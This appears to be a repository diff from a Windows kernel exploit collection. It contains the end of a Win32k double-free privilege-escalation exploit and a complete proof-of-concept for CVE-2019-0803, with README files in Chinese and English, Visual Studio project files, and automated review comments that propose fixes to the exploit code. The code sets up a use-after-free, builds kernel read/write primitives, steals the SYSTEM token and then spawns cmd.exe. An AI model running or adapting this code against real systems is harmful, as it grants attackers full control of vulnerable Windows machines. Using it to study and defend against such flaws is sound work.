}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// double free baseCLS and CloneCLS's lpszMenuName
//
DWORD WINAPI ThreadProc(_In_ LPVOID lpParameter
)
{
ULONG_PTR UserMap;
//触发Clone Class流程
auto hwnd = CreateWindowEx(NULL, L"associated class", NULL, WS_DISABLED, NULL, NULL, 1, 1, NULL, NULL, GetModuleHandle(NULL), NULL);
auto Kernel = p_leak.GetUserObjectAddressBygSharedInfo(hwnd, &UserMap);
cout << "hwnd kernel: 0x" << hex << Kernel << endl;
ULONG_PTR cls = *(PULONG_PTR)(UserMap + 0x64);
ULONG_PTR lpszMenuName = *(PULONG_PTR)(cls - p_leak.g_DeltaDesktopHeap + 0x50);
cout << "lpszMenuName kernel: 0x" << hex << lpszMenuName << endl;
Sleep(200);
//__asm int 3
HACCEL haccel;
session_pool_fill_ge_0x20(0xa0, 1, &haccel);
//第一次释放
SetClassLongPtr(hwnd, GCLP_MENUNAME, (LONG)L"xxx");
DestroyAcceleratorTable(haccel);
SparyDC();
//__asm int 3
//第二次释放
DestroyWindow(hwnd);
if (!ReleaseClass(L"associated class", GetModuleHandle(0)))
{
cout << "UnregisterClass error" << endl;
}
if (!session_pool_fill_ge_0xa0(0xa0, 0x1000, g_hPalettle))
{
cout << "error " << endl;
}
//验证palette是否成功
for (size_t i = 0; i < 0x1000; i++)
{
g_KernelPalettle[i] = (ULONG_PTR)p_leak.GetGdiKernelAddress(g_hPalettle[i]);
if (lpszMenuName == g_KernelPalettle[i])
{
Manage_index = i;
hManage = g_hPalettle[Manage_index];
cout << "success fill 0xa0 by palette" << endl;
cout << "Manage palette kernel: 0x" << hex << g_KernelPalettle[Manage_index] << endl;
cout << "palette : 0x" << hex << hManage << endl;
}
}
modify_palPoniter();
copy_token();
fix_dc();
return 0;
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// main
//
int main()
{
auto hDesk = CreateDesktop(L"newDesktop", NULL, NULL, NULL, DESKTOP_CREATEWINDOW, NULL);
if (!SetThreadDesktop(hDesk))
{
cout << "SetThreadDesktop error" << endl;
}
// pool fengshui
HPALETTE hpalette[0x100];
if (!session_pool_fill_ge_0x20(0xC00, number, hAccel))
{
cout << "error " << endl;
}
if (!session_pool_fill_ge_0x20(0x360, number, hAccel))
{
cout << "error " << endl;
}
if (!session_pool_fill_ge_0xa0(0xa0, 0x100, hpalette))
{
cout << "error " << endl;
}
// allocate 0xa0 size lpszMenuName
wchar_t lpszMenuName[0x200] = { 0 };
for (size_t i = 0; i < 0x48; i++) // (pool_size - 8) / 2 - 4
{
*(lpszMenuName + i) = 0xbeef;
}
WNDCLASSEX wndClass = { 0 };
wndClass.cbSize = sizeof(WNDCLASSEX);
wndClass.lpszClassName = L"associated class";
wndClass.lpszMenuName = lpszMenuName;
wndClass.hInstance = GetModuleHandle(NULL);
wndClass.lpfnWndProc = DefWindowProc;
RegisterClassEx(&wndClass);
//Create DC for NtGdiSetLinkedUFIs
for (ULONG_PTR i = 0; i < 0x1000; i++)
{
g_hDC[i] = (ULONG_PTR)CreateCompatibleDC(NULL);
}
//start exploit
auto hThread = CreateThread(0, 0, ThreadProc, 0, 0, 0);
WaitForSingleObject(hThread, INFINITE);
system("cmd");
return true;
}
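Review bot: NtUserUnregisterClass and NtGdiSetLinkedUFIs (L647–L660, L677–L690) are written as `__asm` blocks, which MSVC accepts only for 32-bit targets, yet the vcxproj in this commit declares Debug|x64 and Release|x64 configurations while the README states the PoC is x86-only; a guard at the top of the file, `#if !defined(_M_IX86)` / `#error "main.cpp builds only in the Win32 (x86) configuration"` / `#endif`, would fail the x64 build with a clear message instead of an inline-assembler error. get_PsInitialSystemProcess checks neither the malloc result nor the strrchr result before `+ 1`, and the SysModule buffer and the LoadLibraryA handle are never released; main likewise never checks CreateDesktop/CreateThread for NULL and never closes hThread or hDesk. The `cout << ... << g_hDC` on L700 prints the address of the array rather than any handle in it, which is probably not the intended log line.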


@ -0,0 +1,48 @@
### CVE-2019-0803
#### 描述
Win32k 权限提升漏洞
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 10 | x86/x64 | 1703 | | |
| Windows 10 | x86/x64/ARM64 | 1709 | | |
| Windows 10 | x86/x64/ARM64 | 1803 | | |
| Windows 10 | x86/x64/ARM64 | 1809 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | &#10004; |
| Windows Server 2008 | x86/x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1709 | | |
| Windows Server | | 1803 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803
```
#### 利用方式
编译环境
- VS2019V142X64 Debug
这里测试机器是Windows Server 2008 R2 x64上GIF图
![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif)
#### 分析文章
- https://bbs.pediy.com/thread-260289.htm
- https://www.jianshu.com/p/91e0f79f36eb
- https://zhuanlan.zhihu.com/p/62520006


@ -0,0 +1,48 @@
### CVE-2019-0803
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 10 | x86/x64 | 1703 | | |
| Windows 10 | x86/x64/ARM64 | 1709 | | |
| Windows 10 | x86/x64/ARM64 | 1803 | | |
| Windows 10 | x86/x64/ARM64 | 1809 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | &#10004; |
| Windows Server 2008 | x86/x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1709 | | |
| Windows Server | | 1803 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803
```
#### Utilization
CompilerEnvironment
- VS2019V142X64 Debug
Here the test machine is Windows Server 2008 R2 X64, on the GIF map
![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif)
#### Analyze
- https://bbs.pediy.com/thread-260289.htm
- https://www.jianshu.com/p/91e0f79f36eb
- https://zhuanlan.zhihu.com/p/62520006

Binary file not shown.


@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.27428.2005
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "poc_test", "poc_test\poc_test.vcxproj", "{13B512BD-3E32-4787-9C1C-0966899F3608}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x64.ActiveCfg = Debug|x64
{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x64.Build.0 = Debug|x64
{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x86.ActiveCfg = Debug|Win32
{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x86.Build.0 = Debug|Win32
{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x64.ActiveCfg = Release|x64
{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x64.Build.0 = Release|x64
{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x86.ActiveCfg = Release|Win32
{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {FC1892D3-67AE-4D7F-99F6-684EA05DA216}
EndGlobalSection
EndGlobal

Binary file not shown.


@ -0,0 +1,570 @@
#include "stdafx.h"
PSHAREDINFO gSharedInfo = NULL;
HWND hwndIcon1 = NULL;
HWND hwndIcon2 = NULL;
PBYTE pwndIcon1 = NULL;
PBYTE pwndIcon2 = NULL;
HWND hwndMenu = NULL;
unsigned long long MySecTokenAddr = NULL;
unsigned long long MyEPROCESSAddr = NULL;
HDC hdc = NULL;
HGDIOBJ hgdiObj = NULL;
PBYTE pgdiObj = NULL;
HBITMAP hBitmap[1000] = { NULL };
static PBYTE buffFakePal = NULL;
static LPACCEL buffAccTabl = NULL;
unsigned long long SystemSecurityTokenAddr = NULL;
static BOOL xxInitExploitInfo(VOID)
{
gSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32"), "gSharedInfo");
return TRUE;
}
static BOOL xxZeroIconWindow2strName(VOID)
{
DWORD offset = (DWORD)((pwndIcon2 + OFFSET_STRNAME_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
DWORD dwori3 = GetWindowLong(hwndIcon1, offset + 0x8);
DWORD dwori4 = GetWindowLong(hwndIcon1, offset + 0xC);
SetWindowLongW(hwndIcon1, offset + 0x0, 0);
SetWindowLongW(hwndIcon1, offset + 0x4, 0);
SetWindowLongW(hwndIcon1, offset + 0x8, 0);
SetWindowLongW(hwndIcon1, offset + 0xC, 0);
WCHAR szPath[100] = {};
GetWindowText(hwndIcon2, szPath, 100);
printf("[*]text:%ws\n", szPath);
if (wcslen(szPath) == 0)
{
SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
SetWindowLongW(hwndIcon1, offset + 0x8, dwori3);
SetWindowLongW(hwndIcon1, offset + 0xC, dwori4);
return TRUE;
}
else
{
return FALSE;
}
}
typedef struct _LARGE_UNICODE_STRING
{
ULONG Length; // 000
ULONG MaximumLength : 31; // 004
ULONG bAnsi : 1; // 004
PWSTR Buffer; // 008
} LARGE_UNICODE_STRING, * PLARGE_UNICODE_STRING;
static BOOL WriteKernelAddress(UINT64 qwAddress, LPWSTR content)
{
DWORD offset = (DWORD)((pwndIcon2 + OFFSET_STRNAME_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
//注:这里不要把LARGE_UNICODE_STRING的长度字段设置成0了
//DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
//DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
DWORD dwori3 = GetWindowLong(hwndIcon1, offset + 0x8);
DWORD dwori4 = GetWindowLong(hwndIcon1, offset + 0xC);
//SetWindowLongW(hwndIcon1, offset + 0x0, 0);
//SetWindowLongW(hwndIcon1, offset + 0x4, 0);
SetWindowLongW(hwndIcon1, offset + 0x8, (qwAddress & 0xffffffff));
SetWindowLongW(hwndIcon1, offset + 0xC, (qwAddress & 0xffffffff00000000) >> 32);
SetWindowText(hwndIcon2, content);
//SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
//SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
SetWindowLongW(hwndIcon1, offset + 0x8, dwori3);
SetWindowLongW(hwndIcon1, offset + 0xC, dwori4);
return TRUE;
}
static int ReadKernelAddress(UINT64 qwAddress)
{
DWORD offset = (DWORD)((pwndIcon2 + OFFSET_SPWNDPARENT_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
SetWindowLongW(hwndIcon1, offset + 0x0, (qwAddress & 0xffffffff));
SetWindowLongW(hwndIcon1, offset + 0x4, (qwAddress & 0xffffffff00000000) >> 32);
unsigned int read = (int)GetAncestor(hwndIcon2, GA_PARENT);
SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
return read;
}
unsigned long long ReadPtrFromKernelMemory(unsigned long long addr) {
unsigned int LowAddr = ReadKernelAddress(addr);
unsigned int HighAddr = ReadKernelAddress(addr + 4);
unsigned long long Addr = ((unsigned long long)HighAddr << 32) + LowAddr;
return Addr;
}
typedef struct _HEAD
{
HANDLE h;
DWORD cLockObj;
} HEAD, * PHEAD;
typedef struct _THROBJHEAD
{
HEAD h;
PVOID pti;
} THROBJHEAD, * PTHROBJHEAD;
typedef struct _THRDESKHEAD
{
THROBJHEAD h;
PVOID rpdesk;
PVOID pSelf; // points to the kernel mode address
} THRDESKHEAD, * PTHRDESKHEAD;
void FindSecurityTokens() {
unsigned long long pti = (unsigned long long)(&((THRDESKHEAD*)pwndIcon1)->h.pti);
printf("[*]Searching for current processes EPROCESS structure\n");
unsigned long long ptiaddress = ReadPtrFromKernelMemory(pti);
printf("\tptiaddress == %llx\n", ptiaddress);
unsigned long long threadTagPointer = ReadPtrFromKernelMemory(ptiaddress);
printf("\ttagTHREAD == %llx\n", threadTagPointer);
unsigned long long kapcStateAddr = ReadPtrFromKernelMemory(threadTagPointer + OFFSET_APCADDR_WIN7);
printf("\tkapc_stateAddr == %llx\n", kapcStateAddr);
MyEPROCESSAddr = ReadPtrFromKernelMemory(kapcStateAddr + OFFSET_APCEPROCESS_WIN7);
MySecTokenAddr = ReadPtrFromKernelMemory(MyEPROCESSAddr + OFFSET_SECTOKEN_WIN7);
printf("\tOriginal security token pointer: 0x%llx\n", MySecTokenAddr);
printf("[*]Searching for SYSTEM security token address\n");
unsigned long long nextProc = ReadPtrFromKernelMemory(MyEPROCESSAddr + OFFSET_EPROCESSBLINK_WIN7) - OFFSET_EPROCESSBLINK_WIN7;
printf("\tNext eprocess address: 0x%llx\n", nextProc);
unsigned int pid = ReadKernelAddress(nextProc + OFFSET_EPROCESSPID_WIN7);
printf("\tFound pid: 0x%X\n", pid);
while (true) {
nextProc = ReadPtrFromKernelMemory(nextProc + OFFSET_EPROCESSBLINK_WIN7) - OFFSET_EPROCESSBLINK_WIN7;
printf("\tNext eprocess address: 0x%llx\n", nextProc);
pid = ReadKernelAddress(nextProc + OFFSET_EPROCESSPID_WIN7);
printf("\tFound pid: 0x%X\n", pid);
//Step 9.2
if (pid == 4) {
printf("\ttarget process found!\n");
SystemSecurityTokenAddr = ReadPtrFromKernelMemory(nextProc + OFFSET_SECTOKEN_WIN7);
break;
}
}
}
static BOOL xxCreateIconWindowEx(VOID)
{
// icon
HWND hwnd1 = CreateWindowExW(0,
L"#32772",
NULL,
WS_MINIMIZE | WS_DISABLED,
0,
0,
0,
0,
NULL,
NULL,
NULL,
NULL);
// icon
HWND hwnd2 = CreateWindowExW(0,
L"#32772",
NULL,
WS_MINIMIZE | WS_DISABLED,
0,
0,
0,
0,
NULL,
NULL,
NULL,
NULL);
PSERVERINFO psi = gSharedInfo->psi;
PHANDLEENTRY phe = gSharedInfo->aheList;
PBYTE pwnd1 = NULL;
PBYTE pwnd2 = NULL;
for (ULONG c = 0; c < psi->cHandleEntries; c++)
{
if ((HWND)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hwnd1)
{
pwnd1 = (PBYTE)phe[c].phead;
break;
}
}
for (ULONG c = 0; c < psi->cHandleEntries; c++)
{
if ((HWND)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hwnd2)
{
pwnd2 = (PBYTE)phe[c].phead;
break;
}
}
if (pwnd1 <= pwnd2)
{
pwndIcon1 = pwnd1;
hwndIcon1 = hwnd1;
pwndIcon2 = pwnd2;
hwndIcon2 = hwnd2;
}
else
{
pwndIcon1 = pwnd2;
hwndIcon1 = hwnd2;
pwndIcon2 = pwnd1;
hwndIcon2 = hwnd1;
}
printf("[+]WND1: %p, WND2: %p\n", pwndIcon1, pwndIcon2);
return TRUE;
}
static BOOL xxTriggerExploitEx(VOID)
{
DWORD count = 0;
HACCEL hAccel1[1000] = { NULL };
HACCEL hAccel2[1000] = { NULL };
for (UINT i = 0; i < 200; i++)
{
//用来塞内存空隙确保0x350大小的内存碎片间隙刚好被填满避免后续Bitmap和DIB占坑出现问题
LPACCEL Entries = (LPACCEL)malloc(132 * sizeof(Entries));
for (UINT i = 0; i < 132; i++)
{
Entries[i].fVirt = FCONTROL;
Entries[i].key = 0x1234;
Entries[i].cmd = 0x4444;
}
hAccel1[i] = NtUserCreateAcceleratorTable(Entries, 132);
if (hAccel1[i] == NULL)
{
break;
}
}
//用来占坑
for (UINT i = 0; i < 1000; i++)
{
LPACCEL Entries = (LPACCEL)malloc(533 * sizeof(Entries));
for (UINT i = 0; i < 533; i++)
{
Entries[i].fVirt = FCONTROL;
Entries[i].key = 0x1234;
Entries[i].cmd = 0x4444;
}
hAccel2[i] = NtUserCreateAcceleratorTable(Entries, 533);
}
for (UINT i = 0; i < 400; i++)
{
hBitmap[i] = CreateBitmap(16, 16, 1, 8, NULL);
if (hBitmap[i] == NULL)
{
break;
}
}
hwndMenu = CreateWindowExW(WS_EX_DLGMODALFRAME | WS_EX_LEFTSCROLLBAR | WS_EX_NOINHERITLAYOUT | WS_EX_LAYOUTRTL | WS_EX_COMPOSITED,
L"#32768",
L"bar",
0x43A | WS_MAXIMIZEBOX | WS_VSCROLL | WS_CAPTION | WS_MAXIMIZE,
58,
18,
60,
-23,
NULL,
NULL,
NULL,
NULL);
NtUserShowWindow(hwndMenu, 0);
UpdateWindow(hwndMenu);
PAINTSTRUCT paint = { 0 };
hdc = NtUserBeginPaint(hwndMenu, &paint);
hgdiObj = GetCurrentObject(hdc, OBJ_BITMAP);
pgdiObj = *(PBYTE *)((*(PBYTE *)((*(PBYTE *)(__readgsqword(0x30) + 0x60)) + 0xF8)) + sizeof(HANDLEENTRY) * (WORD)(DWORD_PTR)hgdiObj);
for (UINT i = 400; i < 800; i++)
{
hBitmap[i] = CreateBitmap(16, 16, 1, 8, NULL);
if (hBitmap[i] == NULL)
{
break;
}
}
for (UINT i = 0; i < 1000; i++)
{
PBYTE pacc = NULL;
HACCEL hacc = hAccel2[i];
PHANDLEENTRY phe = gSharedInfo->aheList;
for (UINT c = 0; c < gSharedInfo->psi->cHandleEntries; c++)
{
if ((HACCEL)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hacc)
{
pacc = (PBYTE)phe[c].phead;
break;
}
}
if (pgdiObj == pacc + 0xCB0)
{
Sleep(1000);
return TRUE;
}
}
return FALSE;
}
static VOID xxBuildGlobalAccTableEx(PVOID pcbWndExtra)
{
DWORD num = 0;
if (buffFakePal == NULL)
{
buffFakePal = (PBYTE)malloc(0x98); // PALETTE
ZeroMemory(buffFakePal, 0x98);
*(PVOID *)(buffFakePal + 0x80) = pcbWndExtra; //DBI对象中tagRGBQUAD地址修改为第一个窗口WndExtra的地址
*(DWORD *)(buffFakePal + 0x1C) = 1; // PALETTE->cEntries
*(PVOID *)(buffFakePal + 0x88) = &num;
}
if (buffAccTabl == NULL)
{
buffAccTabl = (LPACCEL)malloc(sizeof(ACCEL) * 132);
ZeroMemory(buffAccTabl, sizeof(ACCEL) * 132);
}
for (UINT i = 0; i < 132; i++)
{
buffAccTabl[i].fVirt = FCONTROL;
buffAccTabl[i].key = 0x1234;
buffAccTabl[i].cmd = 0x4444;
}
buffAccTabl[11].key = 2;
buffAccTabl[11].cmd = 0;
buffAccTabl[12].fVirt = 0;
buffAccTabl[12].key = 0;
*(WORD *)&buffAccTabl[15].key = (WORD)((DWORD_PTR)buffFakePal);
*(WORD *)&buffAccTabl[15].cmd = (WORD)((DWORD_PTR)buffFakePal >> 16);
*(WORD *)&buffAccTabl[16].fVirt = (WORD)((DWORD_PTR)buffFakePal >> 32);
*(WORD *)&buffAccTabl[16].key = (WORD)((DWORD_PTR)buffFakePal >> 48);
}
INT PocMain2()
{
WCHAR szExePath[MAX_PATH] = { 0 };
GetModuleFileNameW(NULL, szExePath, MAX_PATH);
std::cout << "-------------------" << std::endl;
std::cout << "POC - CVE-2019-0803" << std::endl;
std::cout << "-------------------" << std::endl;
DWORD times = 0;
xxInitExploitInfo();
xxCreateIconWindowEx();
SetWindowText(hwndIcon2, L"abc");
BOOL bReturn = FALSE;
STARTUPINFO si = { 0 };
PROCESS_INFORMATION pi = { 0 };
si = { 0 };
pi = { 0 };
si.cb = sizeof(STARTUPINFO);
bReturn = CreateProcessW(szExePath,
(LPWSTR)L" DDEServer",
NULL,
NULL,
FALSE,
NULL,
NULL,
NULL,
&si,
&pi);
if (!bReturn)
{
return 0;
}
do
{
printf("[+]trying %d times \r\n", times);
if (xxTriggerExploitEx())
{
printf("[!]xxTriggerExploitEx Success \r\n");
break;
}
NtUserDestroyWindow(hwndMenu);
} while (++times < 10);
HWND hwndSrever = NULL;
do
{
hwndSrever = FindWindowW(NULL, L"DDEServerPoc");
} while (hwndSrever == NULL && (Sleep(300), TRUE));
//将之前获取到的GDI句柄传给DDEServer用于之后句柄替换触发漏洞
SendMessageW(hwndSrever, MSG_DDESERVER_SET_GDI_OBJ_ADDR, (WPARAM)hgdiObj, NULL);
//getchar();
si = { 0 };
pi = { 0 };
si.cb = sizeof(STARTUPINFO);
bReturn = CreateProcessW(szExePath,
(LPWSTR)L" DDEClient",
NULL,
NULL,
FALSE,
NULL,
NULL,
NULL,
&si,
&pi);
if (!bReturn)
{
return 0;
}
HWND hwnd = NULL;
do
{
hwnd = FindWindowW(NULL, L"DDEClientPoc");
} while (hwnd == NULL && (Sleep(300), TRUE));
printf("[+]hTriggerWindow %p\n", hwnd);
for (UINT i = 0; i < 300; i++)
{
if (hBitmap[i] != NULL)
{
DeleteObject(hBitmap[i]);
hBitmap[i] = NULL;
}
}
xxBuildGlobalAccTableEx(pwndIcon1 + OFFSET_CBWNDEXTRA_WIN7);
SendMessageW(hwnd, MSG_DDESERVER_EXIT, NULL, NULL);
WaitForSingleObject(pi.hProcess, INFINITE);
for (UINT i = 300; i < 700; i++)
{
if (hBitmap[i] != NULL)
{
DeleteObject(hBitmap[i]);
hBitmap[i] = NULL;
}
}
printf("[+]Wait\n");
Sleep(8000);
SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
HACCEL hAcc[2000] = { NULL };
for (UINT i = 0; i < 2000; i++)
{
hAcc[i] = NtUserCreateAcceleratorTable(buffAccTabl, 132); // UAF
if (hAcc[i] == NULL)
{
break;
}
}
RGBQUAD number = {};
number.rgbBlue = 0x78;
number.rgbGreen = 0x56;
number.rgbRed = 0x34;
if (SetDIBColorTable(hdc, 0, 1, (const RGBQUAD *)&number))
{
printf("[+]SetDIBColorTable OK\n");
}
if (xxZeroIconWindow2strName())
{
printf("[+]hTriggerWindow OK\n");
}
else
{
printf("[!]hTriggerWindow Failed\n");
return 0;
}
FindSecurityTokens();
wchar_t strSysSecToken[5] = { 0x00 };
strSysSecToken[3] = (SystemSecurityTokenAddr >> 48) & 0xFFFF;
strSysSecToken[2] = (SystemSecurityTokenAddr >> 32) & 0xFFFF;
strSysSecToken[1] = (SystemSecurityTokenAddr >> 16) & 0xFFFF;
strSysSecToken[0] = (SystemSecurityTokenAddr >> 0) & 0xFFFF;
printf("[+]Security token to steal: 0x%llx\n", SystemSecurityTokenAddr);
WriteKernelAddress(MyEPROCESSAddr + OFFSET_SECTOKEN_WIN7, strSysSecToken);
printf("Run Cmd...\n");
system("cmd.exe");
return 0;
}
INT DDEServer();
INT DDEClient();
INT main(int argc, char *argv[])
{
if (argc == 1)
{
PocMain2();
return 0;
}
if (argc != 2)
{
return -1;
}
if (strcmp(argv[1], "DDEServer") == 0)
{
DDEServer();
}
else if (strcmp(argv[1], "DDEClient") == 0)
{
DDEClient();
}
return 0;
}
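Review bot: `malloc(132 * sizeof(Entries))` in the first loop of `xxTriggerExploitEx` and `malloc(533 * sizeof(Entries))` in the second size the buffer by the `LPACCEL` pointer rather than by an `ACCEL` element; `xxBuildGlobalAccTableEx` already writes `sizeof(ACCEL) * 132`, so for consistency both should read `malloc(132 * sizeof(ACCEL))` and `malloc(533 * sizeof(ACCEL))`. With an 8-byte pointer this only over-allocates, but the project file also declares Win32 configurations, where a 4-byte pointer would under-allocate and the fill loop that follows would write past the end of the heap block. Those `Entries` buffers are never freed after `NtUserCreateAcceleratorTable` returns, and the inner `for (UINT i ...)` loops shadow the outer `i`, which is easy to misread. Separately, `xxInitExploitInfo` never checks the `GetProcAddress` result, so a NULL `gSharedInfo` is dereferenced at `gSharedInfo->psi` in `xxCreateIconWindowEx`; returning `gSharedInfo != NULL` and testing it in `PocMain2` would fail early instead. `_LARGE_UNICODE_STRING` here duplicates the `_LARGE_STRING` layout from the header under a second name and is not used in this file.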


@ -0,0 +1,176 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>15.0</VCProjectVersion>
<ProjectGuid>{13B512BD-3E32-4787-9C1C-0966899F3608}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>poctest</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
